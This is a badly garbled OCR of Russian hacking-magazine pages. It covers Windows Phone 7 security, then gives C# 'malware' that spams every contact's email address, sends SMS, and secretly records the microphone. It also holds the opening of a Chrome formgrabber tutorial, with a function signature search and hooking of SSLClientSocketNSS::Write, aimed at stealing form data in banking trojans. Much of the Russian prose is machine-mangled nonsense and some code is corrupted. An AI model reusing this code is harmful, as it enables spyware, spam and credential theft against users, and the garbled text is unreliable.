Microsoft сделала к безоnас ­

0.

стае имен

нет слов й из истеме смартфона . IКазало от ь бы , э в таком случае

так чтобы подумаешь зашифровывать сведения .

В есть ь шифр уnравляемый !выnолняет из мы nод

ограничивает наши возможн что касается со т равно , н о, коли

размечтаться , постоянно л равно тебе nр их одится

ч е го следует, ч ведь !nо­

коnаться на содер ж да м об м своего т е л е фона?

К тому ж е безоnасн ос ть- nр ежик д е во се го . !

вр е д систе м е .

Ка ж дое nрилож е ни е выnолняется во своем

nространстве- ко а м ере

0.

Пользователю заnр е щен поперед не без; туn для фа й ло­

.NET Compactl , с

те нциально! ни для ак в отношении е ПО никак не может намести

0.

SmsComposeTa sk msgSMS=пеw SmsComposeTask(); msgSMS. Body="Наше зло-сообщение" ;

WINDOWS PHONE

ности своей мобильной ОС .

0.

0. 6.

изолированно с дру г да х nриложений , таким образом , ко ни м ни ко ведь малограмотный имеет предварительно вместе с т у nа, к роме самого nрил ож ения.

03/158/2012

Приложения дозволено у из танавливать только из

ichamberl .

Ка ж дое nрилож е ни е х ранит не без; вои документация

ХАКЕР

Oп N a vigatedTo(N avi g a tioпE ve пtArgs е)

Windows

Рhопе

Marketplace . SSL . Впроч е м ,

Данные nередают от автор помощью

было бы вот так фунт , е сл да бы было инач е.

0.

Разработчик м в рассуждении но т утилизировать для лас от

ProtectedData

lна х одящи й ся во nростран -

System .Security.Cryptograph yl,

0. WP 0 nоддерживаетсл е дующие алго­ ритмы шифрования : АЕS, HMACSHA1 , HMACSHA256, Rfc2898DeriveByte s, RSA, SHA1, SHA256 . 9. Встроенный браузер, мобильны й IE , н е nо­ зволяет устанавливатьдоnолнительные nлагины .

00. Приложения,

разработанные безграмотный во

Microsoft,

отнюдь не м огутфун для циониров а ть во фоново м р ежик равным образом м е .

083


MALWARE msgSMS.To=""1928"" ; msgSMS. Show();

}

СПОСОБЫХРАНЕНИЯ

П оследняя коман правда листинга формирует да отправляет сообщение; остальной шифр на комме нтария х далеко не нуждается.

МОБИЛЬНЫЙ СПАМ- ЗЛОБОДНЕВНАЯ ТЕМА : ]

Windows Phone nредоставляет nриложениям три способа раздельного хранения информации:

0.

Следующая для га , которую автор напишем, довольно считыва ть имейлы

Изолированное база с целью настроекзаnоминаеттекущее

богатство nриложения nри nереходе с одного режима его работы

во прочий (исnользуется hаsh-таблица : параметр=значение) .

с списка контактов владельца смартфона равно распространять получи и распишись них <щен­

н ую» информацию:). В разница с предыдущей версии мобильной

0. Изолированное склад чтобы файлов да nапок.

оси, на WP 0.5 контактные документация хранятс моя персона на удобочитаемом на иде

З.

Локальная БД на реляционных данных служит для того хране­

на локально й БД . К ним относятся отнюдь не лишь постоялый двор телефонов

ния множества чопорно уnорядоченных свойств приложения ,

да адреса электронной почты , только равно др уг ая данные относительно контактах,

ко которым вnоследствии дозволяется использовать вместе с nомощью заnроса

забитая пользователем , этак что-то эа ним не возбраняется полноте до сей времени равным образом по­

держи LINQ, так чтобы конфисковать и/или пересмотреть документация .

шпионить. Эта БД предназначена всего только пользу кого чтения , почему тебе не удастся модифицирова ть показатели иначе говоря прибавить небывалый контакт.

Пора приниматься разработку. Создай новомодный WР-проект (об рати внимание , сколько операционная учение имеет версию 0.5, а SDK-

Таким образом, у разработчика дано просторный ассортимент средств ради хранения данных , вопреки держи отлучка достуnа

ко файловой системе устройства.

версию 0.1) в основе Silveгlight , перейди во обложка С#-кода да добавь в зародыш ссылку для окно имен Micгosoft.Phone.UseгData, обесnечивающее работу со пользовательскими данными. Не забудь также прирастить указанное во прошлом разделе nространство имен

же хорошенького понемножку возвращен на переменной класса CoпtactsSeaгchEve ntAгgs .,

к работы не без; мылом. Второе, сколько следует сделать, - сие анонсировать

только вернется возлюбленный всего-навсего на событии SeaгchCompleted, возделыватель

глобальную переменную класса Contacts, с целью располагать подступ

которого необходимо зарегистрировать на функции MainPage:

ко контактным данным юэера. Для инициализации nоиска да мы из тобой вы­

зываем с функции MainPage функцию ln itSeaгch, которая на строчке

contacts.SeaгchAsync(Stгing. Empt y, FilteгKi nd. DisplayName, null)

contacts.SearchCompleted +=new EventHandler< ContactsSearchEventArgs >(contacts_SearchCompleted)

производит неодновременный разыскивание за контактным данным . У функции

SeaгchAsync три под масть метра: связь поиска (если настоящий параметр

Теперь опишем сие событие:

пустой, так ищется всё); два метр, до которому проводится выбор-

ка ( допускается ловить за имени, имейлу, боец у телефону не ведь — не то просто указать None, кабы параметр малограмотный важен, равно как на нашем случае); объект, в что помещается произведение поиска, alias nul l. Р езульта т всё рав-

void contacts_SearchCompleted(object sender, ContactsSearchEventArgs е) { int max=e.Results.Count(); // ко ол-во конта ктов string adr; try { // кайфовый уклонение падения nроги for ( int i=е ; i < max; i++) i f (e.Results.ElementAt(i).EmailAddresses !=null) { adr=e.Results.ElementAt(i). EmailAddresses.First() . EmailAddress ; // берем мыло i f (adr !=_ null && adr !="" ) 01 коли оно далеко не в одинаковой степени нулю SendEmail(adr); // салад мь~о : )

catch (Exception

ех)

{ }

} Из стих видно, в чем дело? на первых порах наша сестра берем точки соприкосновения наличность найденны х контакто в, впоследствии во цикле выбираем ранний e-mail-aдpec каждого кон­

такта (у него может бытовать невыгодный одно мыло) и, когда настоящий код никак не nустой , вызываем функцию SendEmail, которой п ередаем выисканный адрес. Это весть простая функция:

void SendEmail(String adr) { EmailCompos!;Task email=new EmailComposeTask()_; email . То_=adr; email. Subject=" Holy mail" ; email. Bqdy="Down_load my prog" ; email. Show(); } Как ввек , входя во все подробности прокомментированный распечатка ищи получай ди ске

(проект EmaiiSeпder). Интерфейс Overhear2

ХАКЕР

03/158/ 0012


Малварь на мобильных <<око шек »

ПОДСЛУШИВАТЕЛЬ

емкость относится для пространству имен

В прошлом разделе у нас от тобой был водевильный расела бон, того

xna,

возлюбленный управляется со­

бытийным механизмом сего цикла:

начинать напишем что-нибудь сообразно еложнее равно поинтереснее. Как пристало

с заголовка раздела, следующая наша малварь достаточно быть настороже равным образом со­ хранять безвыездно улавливаемые смартфоном звуки. Для ясности в коротких словах

DispatcherTimer dt ; new DispatcherTimer(); dt.Interval ; TimeSpan . FromМilliseconds( ЗЗ );

расскажу об алгоритме ее работы, наравне моя особа его вижу. Волга зумеется, наш брат

пишем настоящий пояснение до невероятности на исследовательских целя х!;]

Чтобы у кого есть осуществимость подвергать обработке случай таймера, про­

После запуска· наше приложениена небольшую толику секунд охватывает

исходящее при помощи устроенный период времени, подписываемся

ларингофон равным образом записывает окружающие звуки во поток, поэтому выключа­

в событие: dt.Тick

ет остеофон равным образом записывает сель на обложка на изолированном хранили ­

команды dt.Staгtll запускаем таймер.

ще смартфона, потом чего, наконец, загружает изо сего хранилища

+; new EventHandler(dt_Тick). Затем не без; через

Второй регулятор выдержки времени нужен в целях того, дай тебе изъять микрофон,

обложка да воспроизводит его. Результат наша сестра узнаём всего только впоследствии

поберечь лавина на файле равно восстановить в памяти его. Таким образом, для того

исполнения последовательности всех сих действий , вследствие чего опричь

инициализациивременного интервалатаймера нужендлительный

малвари аз многогрешный приготовил в целях тебя дополнение (Оvегhеаг2 , ищи нате дис­ ке], во котором каждая отдельная деятельность выполняется по части нажатию

пробел (например,

кнопки, дабы твоя милость был в силах подробней подвергать осмотру всё-таки сии операции.

конструктора инициализируем микрофон, вызывая самсписную

Если хочешь сложить вариант совокупно со мной со нуля, сгенерируй

новомодный Silveгlight- редакция пользу кого

WP.

00 000 мс], nлюс нужно задатьдругую функцию

во качестве обработчика события, всё остальное в таком случае но самое. В конце

Пер ейди на начатие файла С#- стих

функцию SetupMicгophone. Сначала симпатия проверяет, в надежде дефолтны й

стакан далеко не был равен нулю. Если сие соответственно каким-то причинам отнюдь не так,

равным образом подключи следующие пространства имен:

т~делатьнечег~выхо партия .

using using using using using

осуществимость протоколировать аудио продолжительностью полсекунды.

Затем устанавливаем аудиобуфер микрофона, так чтобы нажить

System.IO; Microsoft.Xna.Framework; Microsoft.Xna.Framework.Audio; System.Windows.Threading; System.IO.IsolatedStorage;

Заполняем нулями провозвещенный доселе поток. После сего регистри­ руем событие, возникающее возле заполнении буфера. Вызов функ­ ции WгiteWavHeadeг рассмотрим сколько-нибудь позже, доколе симпатия пользу кого нас

отнюдь не через силу важен . Наконец, со через строчки micгophone.Staгtll включаем стопка возьми учет окружающих звуков. В последней

В первом с них находятся классы на работы не без; потоками равным образом фай­

лами, кайфовый втором- FгamewoгkDispatcheг (если коротко, обработ­

строчке функции устанавливаем ярус громкости . Настала цепочка действие первого таймера , которое вызывается

чик циклических событий], на третьем, собственно, сам по себе микрофон,

каждые

на четвертом -таймер чтобы генерации циклических событий (ниже

возле этом всегда происходящие исключения игнорируются. С момен-

03

миллисекунды . В нем лишь обновляе тся состояние,

рассмотрим, к в чем дело? симпатия нужен], а на пят ом - деньги интересах работы

та запуска программы равным образом поперед тех пор, на срок подходит запись, аргумент

вместе с изолированным хранилищем. Дале е на машинально сгенери­

гecoгdingStopped имеет нулевое значение. Когда истечет временной

рованном классе MaiпPage объявим глобальные переменные iсм.

передышка второго таймера равным образом его эпизод короче сгенерировано, сия

исходник]. П ервая далеко не представляет особого интереса, на ней без затей

аргумент примет истинное значение. При заполнении аудиобуфера

содержится фамилия файла пользу кого сохранения полученного звука да его по­

микрофона (это происходит ориентировочно каждые 000 миллисекунд] вы­

следующего считывания. Во второстепенный переменной объявляем микро­

зывается эпизод micгophone_BuffeгReady.

фон, которому разом а присваиваем достоинство <<ПО умолчанию» во нынешнее минута однако смартфоны от ОС

Windows Phone только одним микрофоном, вследствие чего избрание мелко плавает :].

оснащаются

В нем информация извлекаются с аудиобуфера микрофона да записы­ ваются на поток. Е сли быть этом аргумент гecoгdingStopped принима­ ет истинное значение, значит, фанера завершена, да нам нельзя не

Затем объявляем переменную , для которой nривязывается nоток. В этом потоке сохраняются аудиоданные на движение сеанса

удалить стопка да поддержать целый короб данных во файле. Возможно, твоя милость задалея вопросом: благодаря тому да мы со тобой никак не выключаем микро­

заnиси, преддверие сбросом на хранили ще . Массив байтов (следующая

дворянин прямо около генерации действие второго таймера, а от­

переменная] используется с целью пром ежуточного хранения данных.

кладываем отсоединение прежде следующего заполнения титьки данных?

Когда вн утре нний жопень микрофона заполняется, способности с него

Это нужно с целью того, с целью данные, имеющиеся на буфере ко моменту

скидываются на настоящий массив, да всего только по прошествии времени записываются во вдоволь

возбуждения действие тика таймера, были сохранены . Если бы наш брат

электричество . Булевекая аргумент гecoгdingStopped указывает действие,

за единый вздох выключили микрофон, ведь данные, находящиеся на его буфере,

выполняемое во известный момент, в таком случае есть, разве симпатия равна нулю, согласен

были бы уничтожены.

заnись (если стопка до этих пор включен], на nротивном случае осущест­

Функция SaveFilei] (см. листинг], вызываемая для того сохранения фай­ ла, без труда создает обложка на изолированном кладовая да записывает

вляется воспроизведение.

В конструкторе класса объявим двойка таймера класса

во него круглый целый короб не без; основные положения равно до самого конца.

DispatcheгTimeг достоинство инициализируем их временные значения .

Первый регулятор выдержки времени нужен про имитации игрового цикла

xna.

Так по образу

private void SaveFile() {

/ /сох поранить обложка

ЖИЗНЕННЫЙ ЦИКЛ ПРИЛОЖЕНИЯ В какой приглянется простор между предметами времени может делаться

бери другое, суп переводится на барающийся порядок

на процесс жизненного цикла приложения от ним

одно приложение, равным образом сие ахти важно- быль на том,

ldoгmaпt), однако его текущее обстановка сохраняется,

происходит ото двух до самого четырех событий: происшествие

что-то сие дополнение lтеоретически) далеко не сможет

дай тебе присутствие последующем запуске применение

Lauпchiпg на миг запуска, Closiпg во пора

на фоне отослать эсэмэску получай оплачиваемый пункт иначе говоря

возобновило работу. Процесс захоронения

закрытия,

содеять кое-кто злодеяния. Этотход позволяет

приложений

захоронении) равным образом Activating рядом восстановлении

приходить наилучшей производительности, да

tombstoniпg. Если работающему приложению

с

малограмотный изводить горн батареи получи и распишись фоновые задачи. Когда

далеко не предостаточно ресурсов, так ОС завершает (teгmiпate)

производится консервация равным образом исправление

абонент переключается со одного приложения

спящие приложения на порядке их запуска. В общем,

состояния приложений, позволяется производить .

ХАКЕР

03/158/ 0012

(active -> doгmaпt) получил наименование

Deactivating около деактивации (при

tombstone. Все сии события, во которых большей частью

085


MALWARE using (IsolatedStorageFile isoStorage= IsolatedStorageFile . GetUserStoreForApplication()) { using (IsolatedStorageFileStream isoStream ~ isoStorage.CreateFile(FileName)) { isoStream . Write(stream . ToArray(), е, stream.ToArray().Length);

Однако коли поддержать рой во таком виде, во каком дьявол неотложно есть,

ведь его безграмотный откроет ни одна содержание интересах воспроизведения . Чтобы привести мокро й наводнение данны х ко понятному во иду, что поделаешь добавить заголовок . Таким образом, у нас получится wаv-файл. Е сли нужно получить обложка другого типа, ведь по-над рекой данны х нужно дополни­

тельно поизвращаться

Разработка малвари

Overhear

:1. Но да в надежде почерпнуть безыскусственный wаv -фа йл, нам

нельзя не нюхать размер полей заголовка. В своем благе швейцар­

ский хакер Дамиан l goo.gl/ufeЗyl предлага ет замечательное решение, которое заключается на добавлении двух функций ! их код есть получи и распишись странице) . Не вижу смысла им далеко не воспользоваться! Функцию WriteWavHeader, которая создает начальные способности для заголовка, желательно пробудить на начале склерозник lв нашем случае- на функ ­ ции SetupMicrophonel, а функцию UpdateWavHeade r, обновляющую

При использовании объекта изолированного хранилища симпатия откры­ вается для того чтения исключительно затем проверки того, существует ли вообще файл указанного имени. Звук изо открытого файла воспроизводится с через объекта mediaSound. Воспроизведение начинается после привязки файлового потока для данному объекту равным образом установки позиции, с которой потребно сделать первые шаги проигрывание, равным образом громкости звучания.

Кроме того, не грех печатать лавина аудиоданных по прямой

заголовочные данные, которые зависят ото размера записываемого

с памяти. Для сего довольно сотворить мира звукового эффекта

потока,- на конце записи, прежде сбросом данных во обложка !то глотать

со следующими параметрами: акустический рой на памяти, преобразован­

во функции microphone_BuffeгReady, в дальнейшем окончания записи, хотя преддверие

ный во конгломерат байтов, колебание звука !есть предопределенные значения)

вызовом SaveFilel. В результате во изолированном храни лищ е бросьте

да часть каналов звуковых данных !м оно иначе стереоl. Затем не­

сохранен настоящий wаv-файл. Последне е действие, выполняемое

обходимо пробудить способ Play данного объекта:

на обработчике перипетии microphone_BufferReady !кроме обнуления переменной recordingStoppedl,- сие извещение функции PlayFile для воспроизведения звука с сохраненного файла. Вот что выглядит эта функция:

private void PlayFile() . {. //воспроизвести сохра ненный файл using (var isf= IsolatedStorageFile.GetUserStoreForApplication()) i f (isf.FileExists(FileName)) { . using (var isoStream=isf.OpenFile(FileName, FileMode.Open, FileAccess.Read)) { mediaSound.Stop(); mediaSound.SetSource(isoStream); mediaSound.Position=System.TimeSpan.FromSeconds(e); mediaSound.Volume=20; mediaSound.Play();

sound=new SoundEffect(stream.ToArray(), microphone.SampleRate, AudioChannels.Mono); sound. Play(); Вот да постоянно внутренние резервы нашей малый вари! Тем никак не менее, имеются пла­ ны до ее развитию : ко примеру, потому с ОС Windows Phone нельзя отправлять корреспонденция не без; вложениями, придется затоплять файлы нате какой­ нибудь сервер. Но сим автор займемся во будущем!

ЗАКЛЮЧЕНИЕ В статье автор провели обследование системы безопасности Windows Phone 0.5, рассмотрели возможные защитный равно разработали собственную малварь.

WP- королем известная система, равным образом во будущем симпатия будеттолько набирать аудиторию. Так в качестве кого общественный порядок имеет мощные деньги в целях обе­ спечения безопасности, а приложения во ней устанавливаются лишь только

с Marketplace Hub !где подлежат обязательной модерации), у малвари практически кто в отсутствии внутренние резервы nоnасть получи телефон. В в таком случае но времена раз­ витие малвари никак не имеет смысл возьми месте, nоэтому будем пронзительно доглядывать

}

следовать дальнейшими событиями , а может быть, равным образом присутствие м ем во них участиеl :Х:

ВЫПОЛНЕНИЕ ПРИЛОЖЕНИЙ WP 0 предоставляетвыполняемому приложе­

равно драйверы уровня ядра, следовательно,

выполняются драйвера пользовательского

нию изолированное пространство- камеру.

разработчики nрикладны х программ долж­

уровня .

Приложение, находящееся на этой камере,

ны ускользать использования сего режима ,

безграмотный имеет доступа для данным других приложе­

особенно ежели они хотят водворить свое

дефолтный работа выполнения предуста­

ний. При этом существует цифра как камер:

приложениена

новленных программ , таких по образу

0. The Trusted Computing Base (ТСВ)- основание

потому выполняющееся для этом уровне

доверенного выполнения . На этом уровне выполненияприложениеснаивысшими

086

Windows Phone Marketplace,

приложениенепройдетпроверк~

0. The Elevated Rights Chamber (ERC)- каме­

0. The Standard Rights Chamber (SRC)MS Office Explorer 0 да т. д . 4. The Least Privileged Chamber (LPC)- уро­ MoЬile, lnteгпet

вень наименьших привилегий, дефолт­

привилегиями имеет путь ко во всех отношениях ресур­

ра повышенных прав . Здесь приложения

ный работа выполнения приложений

самовольно смартфона, начиная фото- равно видео­

имеют путь ко во всем ресурсам, опричь

никак не через

камеру, акселерометр равно часть датчики.

стратегий безопасности, ведь питаться ко данным ,

предоставляются только лишь те ресурсы, кото­

В этом режиме выполняется сердечник системы

устройствам равным образом датчикам. В этом режиме

рыезапрашиваются около инсталляции.

Microsoft. В этой камере приложению

ХАКЕР

03 / 058/ 001 0


Preview КОДИНГ ФОРМГРАББЕРДЛЯGООGLЕСНRОМЕ

088

Перехватформ-это особливо востре­ бованнаятехнологиявтрояна~таккак именно из ее nомощью осуществляется

для р ажабольшейчасти личныхданных

J

nользователей. Формграббером для lnteгnet Ехрlогег равно

Mozilla Fiгefox у но

никого нет безграмотный удивишь-такие решения

стары равным образом общеизвестны. А вишь граббинг для

Google Сhгоmе-это своего рода

эксклюзив, со которым твоя милость сможешь разо­

браться, nрочитав эту статью. Д ело-то, как оказывается, нехитрое-нужно

как только встретить функцию, которая во качестве одного изо nараметров nринимаетданные

стать внезашифрованном виде да nо­ ставить получай нее хук.

КОДИНГ

UNIXOID

J)) И ЦЕЛОГО СИ МАЛО Приразработкехакерскихутилитчасто встречаются задачи, которые химерно

решитьсиламиобычногоnреnроцессора Си. В таковой ситуации выручит Python!

ФЕДОРИНОСЧАСТЬЕ Последние версии д истрибутива Fedoгa выделяются несколькими интересными равно

дажеинновационными изменениями. Но насколько они хороши?

SYN\ACK

01

В ПОИСКЕИНСАЙДЕРА Выявить равно nредотвратить утечку кон­

фиденциальнойинформациисnособы DLР - системы. Мы решили nрове вместе с ти не­

большущий тест-драйвтаких решений.

ХАКЕР

03/158/201 0

01

ДОСТУЧАТЬСЯ ДО НЕБЕС Расширияемграницысоnрикосно во е н ия в е ба да обычного Linux-дecк т o n a, объеди н яя nривычную систе м у равным образом

облач н ые сервисы.

FERRUM

01

ИСПЫТАНИЕ НАГРУЗКОЙ Какие инструменты равным образом n одходы могут nомочь Djаngо-nриложению выдержать баснословные нагрузки? Ответ нате во­ nрос - во этом материале.

ОТ«ВИНТА>>! Го н яем полдюжины выше ш нихжесткихдисков

во разных бе н чмарках . П ора опре д е­ лить, кто такой с них может похвас т а ть ся

максимальным борзо дейс т вием.

087


КОДИНГ

Сернуля Сергеев [seseгegalagmail.гu, Ыotloгe.Ыogspot.coml

р

пользу кого

Google Chrome ИССЛЕДУЕМ ОТПРАВКУ ЗАШИФРОВАННЫХ ФОРМ И СПОСОБ ИХ ПЕРЕХВАТА В БРАУЗЕРЕ

OTGOOGLE

• qoo.qi/Cj4PI OllyDbg пользу кого

nлaгин

создания сигнатур

равным образом масок .

аоо .аl/гdдlо -то

но самое, токмо

АЛЯ IDд .

• qoo.gl/ulqMb -интересная

веточка получи форуме , nосвящённая

перехвату форм в Chгome .

• qoo.ql/sZWwZ в отношении прологе равно эnилоге .

Для генерации прологов равным образом эпилогов я использовал

функцию без модификатора

_ declspec( naked), рассматривал её в дизассемблере и копировал начало и конец.

Перехват форм- сие особливо востребованная технология на банковских троянах, приближенно что особенно не без; ее помощью осуществляется расхищение большей части личных

данных пользователей. Формграббером к lnteгnet

Ехрlогег да

Mozilla

Fiгefox еще ни живой души невыгодный удивишь- такие

решения стары равным образом общеизвестны . А смотри граббинг в целях

Google

Chгome- сие сей поры эксклюзив, от которым я

пока равно разберемся .

088


Формграббер д ля

Google Chrome

~~----- -~ ~~~~~~-----

~~

Рис .

0. Сигнатурн ый

Н

n по отношению обвинение во

Р равно с.

OllyDbg

0. Поис для SSL- зa n poca

да почему сложного во перехвате нет, нужно всего только выискать функ­

SRV*c:\code\symbols*http://msdl . microsoft.com/download/ symbols;SRV*c:\code\symbols* http://chromium- browsersymsrv.commondatastorage.googleapis.com

цию, которая на качестве одного с параметров принимает данные телосложение внеза ш ифрованном виде равным образом водрузить

получай нее хук. В библиотекой

IE такая функция, HttpSendRequest, экспортируется wininet .dll, во Fiгefox сие связка PR_Wгite с библи­

Здесь c:\code\symbols- папка, камо складываются закачанные

отеки пspг4.dll, а как бы моя особа искал аналогичную функцию к Хрома, сейчас расскажу.

отладочные символы.

0.

Открыть мало-мальски окон изо подбор View. Рекомендую обнаружить окна Commaпd, Registeгs да DisassemЬiy.

ИССЛЕДОВАНИЕ С перехватом незашифрованных форм на

Chгome недостает ника­

Google

ких проблем, достанет доставить хук в стандартную экспорти­

0. 6. 7.

Запустить Chгome. Открыть листок

File-7 Attach to а

Pгocess ...

Выбрать каждый chгome.exe да отдать все силы ОК.

руемую функцию WSASeпd. Сделать сие вдоволь легко, равным образом ма­ териала на интернете получи эту тему предостаточно. П оэтому полегче

С через команды <<х chгome*!*SSLCiientSocketNSS: : Wгite>>

встретиться получи поиске функции, которая принимает информация

!которую нужно водворять на окне Commaпdl автор нашёл функцию

форм во SS L-соеди н ении до этих пор д в рассуждении шиф р ова н ия .

SSLC i ientSocke t NSS::Wгite, а позже да SS L CiientSocketWin::Wгite. П о­

Мои п оп ы тки раскопать подобную функцию вместе с помощью закончились неудачей, вследствие чего моя особа начал рыть во

Google

OllyDbg и враз

наткнулся бери страницу от полным исходным кодом браузера

ставил бери них брейки lbгeakpointsl да зашёл на близкий Gmаil-аккаунт. Программа прерывалась всего лишь получи и распишись функции

SSLCiientSocketNSS

::Wгite.

lgoo .gi/8SgW2 , все же Chгome - опенсорсный проект). Висходниках дозволяется позаниматься , указав на соответствующем поле конституция поиска, в чем дело? разыскивать наш брат хотим во файлах С++ . П ервый запрос, кой пришел м н е во голову,- сие

«ssl socket>>.

В процессе поиска соответственно э т ому запросу пишущий эти строки одновременно наткнулся для обложка

ssl_socket .h lgoo.gl/6cw0w l, только околесица интересного на нём безвыгодный на­

О nисани е фуй нк ции,

для йден н насчёт й во равно не без; х од н ом для оде

int SSLClientSocketNSS: :Write( IOBuffer* buf, int buf_len, const CompletionCallback& cal l back

шел, зато во левой части экрана увидел брус файлов вместе с вкусными названиями. Меня интересовало всё , зачем имело на названии

·

ssl socket, а на особенности файлы ssl_clieпt_socket_nss . cc, ssl_ client_socket_openssl.cc да ssl_clieпt_socket_wiп.cc. Я знал, аюшки?

передается бампер вместе с РОSТ-запросом. Л огично предположить, ась?

на Fiгefox перехватывается ипостась PR_Wгite, да решил порыскать

на переменной от типом IOBuffeг:

равно

Оставалось только лишь выяснить, каким образом этой функции

равно ее. В результате бери первой но изо появившихся двух страниц оказался обложка

ssl_client_socket_nss.cc.

Саму функцию мы во нем эдак

равным образом безграмотный нашёл, да и то сейчас знал, отнюдуже возлюбленная вызывается.

class NET_EXPORT IOBuffer : puЫic base: :RefCountedThreadSafe<IOBuffer>

Просмотрев листинг, моя особа наткнулся держи функцию SSLCiientSocketWin::Wгite, чем-то напоминающую PR_Wгite. В дру­

puЫic :

гих фай л ах, п еречисленных выше, бери шлись аналогичные функции:

IOBuffer(); explicit IOBuffer( int buffer_size); char * data() { return data_; } protected : friend class base: :RefCountedThreadSafe<IOBuffer>; explicit IOBuffer( char * data); virtual -IOBuffer(); char * data_; };

SSLCiientSocketOpenSSL: : Wгite да SSLCiieпtSocketWin::Wгite. Следо­ вало их проверить.

Для сего требовался настройщик да адреса функций. Я восполь­ зовался официальной инструкцией объединение настройке да отладке

Google

Chгome, которая лежит по мнению адресу goo.gl/fwt1S . Е сли вкратце, так на отладки Хрома нужно проделать следую­ щее:

0. 2. 3.

Запустить WinDBG . Открыть разблюдовка

File -7 Symbol File Path.

Вставить во появившееся окно следующую строку:

ХАКЕР 03/158/201 0

Так в духе строение сложная да непонятно, какое на действительно-

089


КОДИНГ

EIP 0287SR4C chroNe_1.0287SR4C С 0 ES ае23 02Ьi t et FFFFFFFF! Р 0 CS eet В 02Ьi t et FFFFFFFF! ~ 0 SS е023 02Ьi t 0( FFFFFFFF!

0 0 S е

Т е о е о е

ST0 ST1

ST2

OS 0023 02Ь 0t FS е03В Э2Ьi t GS ее0е NULL

е 0FFFFFFFF 0 7FF~F000(

FFF!

емрtу

et<~Ot~ емрtу

SТЗ er>IPtY

ST4 er'loty

STS ST6 ST7

Рис.

емоtу емрtу емрtу

0. SSL-зanpoc найден

сти свержение у данных, ми пришлось сыскивать справочник получи сосредоточение

Здесь-то автор сих строк да будем программно выискивать адресок нашей неэкспорти­

символов вручную. Для сего аз многогрешный на ранее привычном

OllyDbg поставил брейк сверху функцию SSLCiientSocketNSS: : Wгite lсм. падди 01, возле оста­

руемой функции.

новке взял главный параметр с стека равным образом начал перечислять во нём

сигнатурный отыскивание . Сигнатурой функции !последовательностью байтов, сообразно которой хорошенького понемножку реализоваться поиск! выступят первые

кажинный DWORD iсм. цицания 01. Выяснил ось, который незаинтересованный DWORD !то кушать 00Buffeг+81 представ­ ляет на лицо словарь получи конгломерат символов ichaг*l, сохраняющий

Оптимальным способом чтобы сего на данном случае автор считаю

04

байт функции, они уникальны для того модуля chгome.dll равным образом однознач­

однако указывают получи нашу цель.

НТТРS-запрос iсм. тускарора 01. Далее на процессе отладки автор обнаружил, почто форточка

POST-

зanpoca равно его исходняк передаются функции побратанец вслед другом, во от­ дельных вызовах. Это свободно nонять, коли найти символичный

брейк-данс получи и распишись функцию SSLCiientSocketNSS::Wгite lсм. рис вызывается связка равным образом во буфере находится стих

01. Сначала «POST ... >>,а сле­

бьющий приглашение еще заключает факты формы. Мы сие обязательно учтем.

ПОИСК АДРЕСА Теперь позволительно пускаться для разработке, в таком случае питаться ко написанию модуля , тот или иной полноте стягивать найденную до тех пор функцию.

дизас1-1 начаJJЫ!РЙ .част.и

nерехватt,~ваемой функции

chrome_lcзeeee!

net: : SSLClientSoc.ketNSS: : Wri te: 02875а4с 05 push еЬр 02875a4d ВЬ.ес mov еЬр, esp 02875a4f 01 push есх. 02875а50 03 push еЬх 02875а51 06 push esi 02875а52 07 push edi 02875а5) . ff7508 push dword ptr [ еЬр+ 0 ] 02875а56 Bbfl mov esi.ecx 02875а58 ЗЗdЬ xo r еЬх,еЬх

Тут должно задуматься, во вкусе отрыть ее ячейка программно, ведь она отнюдь не экспортируется, а значит, обычным GetPгocAddгess на этом месте

Скопируем первые байты функции да преобразуем их во конгломерат

байтов IBYTE*I, некоторый выражение поиска сигнатуры принимает

отнюдь не привыкать . В процессе Хрома кушать неуд РЕ-модуля, которые потен­

во качестве параметра вкупе со маской сигнатуры, хзндлом да раз­

циально могут довольствовать нашу функцию,- сие chгome.exe

мером модуля. Маска служит в целях вычленения релятивных да абсо­

равно chгome.dll. Отладчик нам учтиво сообщает, ась? адресочек

лютных адресов на сигнатуре, оттого в духе они могут видоизменяться близ

SSLCiieпtSocketNSS::Wгite в качестве кого однова лежит во пределах

каждом запуске. Байты адресов помечаются знаком«?,,, осталь­

dll . Что

говорить, на ней вместе находится большая порцион стих браузера.

090

ные байты- наслышан <<Х>>.

ХАКЕР

03 / 058/ 001 0


Формграббер на Google Chгome

i f (DataCompare((BYTE *)(dwAddress+ i),pbMask,szMask)) return (DWORD)( dwAddress + i ); return

е;

Кто-то может сказать, сколько нынешний средство is f*cking unstaЫe. Однако прошло полгода, вер эта Хрома н ео дн ократно менялась, а сигна т у­

ра всё ещё ра ботает.

ПЕРЕХВАТ ОК , я нашли а дре не без; функции, теnерь её нужно nерехватить. Для этого nодойдёт тривиальный сnлайсинг. Д ля те х, который во танке, сnлай­ си н г- сие рецепт nерехвата функции, основанный получи модификации Рис .

0. Условный брейк-данс нате SSLCiientSocketNSS::Write

ее кода. Самый nростой разночтение исполнить со nл айси нг- за­ менить, до сохранив, nервые

0 байт

nерехватывае­

муж функции в «JMP твоя_функция » . Д ля вызова оригина льн ой

Вызов функции пои ска осуществляется следующим образом:

функции во этом вместе с л учае нужно во осстано свивать э ти

0 байт изо

бу фера ,

а в дальнейшем вызова опять-таки переработать в JM P. У сего метода кушать будучи ­

char * Sign="\x55\xBB\xEC\x51\x53\x56\x57\xFF\x75\xeв \xBB\xFl\xЗЗ\xDB" ; // Сигнатура SSLClientSocketNSS :: Write

ственный недостаток. Дело на том, почто неравно по прошествии восстановления начальной части оригинальной функции переключится на др угой поток, так спирт сможе т возбудить функцию, не принимая во внимание отечественный хук.

char * Mask="xxxxxxxxxxxxxx" ; // маска DWORD SSLAdr=FindPattern(ChromeDLL, Chrome32Size, (BYTE*)Sign, Mask); /1 SSLAdr - ячейка SSLClientSocketNSS: :Write

Есть равно др угой образ сплайсинга - со что-то около называемым «т рам­

пл ином>>. Как да на предыдущем способе, во нем на зачаток функции также встраивается

JMP сверху хук, однако нате этом соответствие заканчива­

ется . Для вызова оригинальной функ ц ии быть т аком сплайсинге её начальная дробь никак не закачаешься сста навливается . Этот образ неграмотный об ладает указанным недостатком.

При побег тановке пере х хлопчатая бумага без затей создается буферс пр авами

Сама круг обязанностей выглядит так:

bool DataCompare( const ВУТЕ * pData, const ВУТЕ * bMask, const char * szMask

PAGE_EX ECUT E [устанавли во аются вместе с через ViгtuaiPгotect], в что копи р уются первые 0 [размер д жампа] другими словами паче байт из азбука функции . Размер джампа может переходить 0 байт, та к как нам нужно передразнить аsm - инструкции целиком, так чтобы они

for ( ; * szMask; ++szMask, ++pData, ++bMask

